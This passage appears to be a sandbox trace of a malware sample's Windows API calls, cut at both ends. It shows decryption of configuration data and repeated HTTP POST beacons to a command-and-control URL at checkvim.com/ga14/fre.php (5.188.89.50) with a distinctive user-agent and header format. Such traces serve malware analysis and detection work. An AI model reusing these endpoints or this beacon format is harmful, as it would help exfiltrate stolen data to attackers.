(lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.799] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0242.799] GetProcessHeap () returned 0x840000 [0242.799] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0242.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.800] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0242.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.801] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0242.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.802] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0242.802] GetProcessHeap () returned 0x840000 [0242.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0242.802] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0242.803] GetProcessHeap () returned 0x840000 [0242.803] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b88 [0242.803] socket (af=2, type=1, protocol=6) returned 0x348 [0242.803] connect (s=0x348, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0242.869] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0242.870] GetProcessHeap () returned 0x840000 [0242.870] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0242.870] GetProcessHeap () returned 0x840000 [0242.870] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0242.870] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0242.871] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0242.871] GetProcessHeap () returned 0x840000 [0242.871] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0242.872] GetProcessHeap () returned 0x840000 [0242.872] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0242.872] GetProcessHeap () returned 0x840000 [0242.872] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f830 [0242.872] GetProcessHeap () returned 0x840000 [0242.872] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0242.872] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0242.873] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0242.873] GetProcessHeap () returned 0x840000 [0242.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0242.873] GetProcessHeap () returned 0x840000 [0242.873] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0242.873] send (s=0x348, buf=0x873a58*, len=237, flags=0) returned 237 [0242.873] send (s=0x348, buf=0x87eb58*, len=159, flags=0) returned 159 [0242.873] GetProcessHeap () returned 0x840000 [0242.874] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0242.874] recv (in: s=0x348, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0243.225] GetProcessHeap () returned 0x840000 [0243.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0243.225] GetProcessHeap () returned 0x840000 [0243.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0243.225] GetProcessHeap () returned 0x840000 [0243.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0243.225] GetProcessHeap () returned 0x840000 [0243.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0243.225] closesocket (s=0x348) returned 0 [0243.225] GetProcessHeap () returned 0x840000 [0243.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b88 | out: hHeap=0x840000) returned 1 [0243.225] GetProcessHeap () returned 0x840000 [0243.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0243.226] GetProcessHeap () returned 0x840000 [0243.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0243.226] GetProcessHeap () returned 0x840000 [0243.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0243.226] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb50) returned 0x348 [0243.227] Sleep (dwMilliseconds=0xea60) [0243.228] GetProcessHeap () returned 0x840000 [0243.229] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0243.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.229] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0243.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.235] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0243.240] GetProcessHeap () returned 0x840000 [0243.240] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0243.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.241] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0243.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.242] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0243.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.243] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.243] GetProcessHeap () returned 0x840000 [0243.243] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0243.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.244] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0243.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.245] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0243.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.246] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0243.246] GetProcessHeap () returned 0x840000 [0243.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0243.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.247] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.248] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.249] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.249] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.250] GetProcessHeap () returned 0x840000 [0243.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0243.250] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0243.250] GetProcessHeap () returned 0x840000 [0243.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0243.250] GetProcessHeap () returned 0x840000 [0243.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0243.250] GetProcessHeap () returned 0x840000 [0243.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0243.250] GetProcessHeap () returned 0x840000 [0243.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0243.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.251] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0243.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.256] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0243.263] GetProcessHeap () returned 0x840000 [0243.263] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0243.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.264] CryptImportKey (in: hProv=0x86f2d0, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0243.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.265] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0243.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.266] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.266] GetProcessHeap () returned 0x840000 [0243.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0243.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.267] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0243.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.268] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0243.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.268] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0243.268] GetProcessHeap () returned 0x840000 [0243.268] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0243.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.269] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0243.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.270] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0243.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.271] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0243.271] GetProcessHeap () returned 0x840000 [0243.271] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0243.271] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0243.272] GetProcessHeap () returned 0x840000 [0243.272] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0243.272] socket (af=2, type=1, protocol=6) returned 0x34c [0243.272] connect (s=0x34c, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0243.346] FreeAddrInfoW (pAddrInfo=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0243.346] GetProcessHeap () returned 0x840000 [0243.346] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f930 [0243.346] GetProcessHeap () returned 0x840000 [0243.346] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0243.346] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0243.347] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0243.347] GetProcessHeap () returned 0x840000 [0243.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0243.347] GetProcessHeap () returned 0x840000 [0243.347] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0243.347] GetProcessHeap () returned 0x840000 [0243.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0243.347] GetProcessHeap () returned 0x840000 [0243.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0243.348] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0243.349] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0243.349] GetProcessHeap () returned 0x840000 [0243.349] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0243.349] GetProcessHeap () returned 0x840000 [0243.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0243.349] send (s=0x34c, buf=0x873a58*, len=237, flags=0) returned 237 [0243.349] send (s=0x34c, buf=0x87eb58*, len=159, flags=0) returned 159 [0243.349] GetProcessHeap () returned 0x840000 [0243.349] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0243.350] recv (in: s=0x34c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0243.720] GetProcessHeap () returned 0x840000 [0243.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0243.720] GetProcessHeap () returned 0x840000 [0243.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0243.720] GetProcessHeap () returned 0x840000 [0243.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0243.720] GetProcessHeap () returned 0x840000 [0243.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f930 | out: hHeap=0x840000) returned 1 [0243.720] closesocket (s=0x34c) returned 0 [0243.721] GetProcessHeap () returned 0x840000 [0243.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0243.722] GetProcessHeap () returned 0x840000 [0243.722] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0243.722] GetProcessHeap () returned 0x840000 [0243.722] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0243.722] GetProcessHeap () returned 0x840000 [0243.722] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0243.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xcc4) returned 0x34c [0243.723] Sleep (dwMilliseconds=0xea60) [0243.725] GetProcessHeap () returned 0x840000 [0243.725] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0243.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.726] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0243.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.733] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0243.740] GetProcessHeap () returned 0x840000 [0243.740] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0243.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.742] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0243.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.743] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0243.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.744] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.744] GetProcessHeap () returned 0x840000 [0243.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0243.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.745] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0243.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.746] CryptDestroyKey (hKey=0x87e670) returned 1 [0243.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.747] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0243.747] GetProcessHeap () returned 0x840000 [0243.747] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0243.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.748] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.749] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.750] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.752] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.752] GetProcessHeap () returned 0x840000 [0243.752] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0243.752] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0243.752] GetProcessHeap () returned 0x840000 [0243.753] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0243.753] GetProcessHeap () returned 0x840000 [0243.753] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0243.753] GetProcessHeap () returned 0x840000 [0243.753] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0243.753] GetProcessHeap () returned 0x840000 [0243.753] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0243.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.754] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0243.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.763] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0243.772] GetProcessHeap () returned 0x840000 [0243.772] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0243.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.773] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0243.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.774] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0243.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.775] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.775] GetProcessHeap () returned 0x840000 [0243.775] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0243.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.776] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0243.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.777] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0243.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0243.778] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0243.778] GetProcessHeap () returned 0x840000 [0243.778] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0243.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.780] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0243.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.781] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0243.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.783] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0243.783] GetProcessHeap () returned 0x840000 [0243.783] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0243.783] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0243.784] GetProcessHeap () returned 0x840000 [0243.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0243.784] socket (af=2, type=1, protocol=6) returned 0x350 [0243.784] connect (s=0x350, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0244.104] FreeAddrInfoW 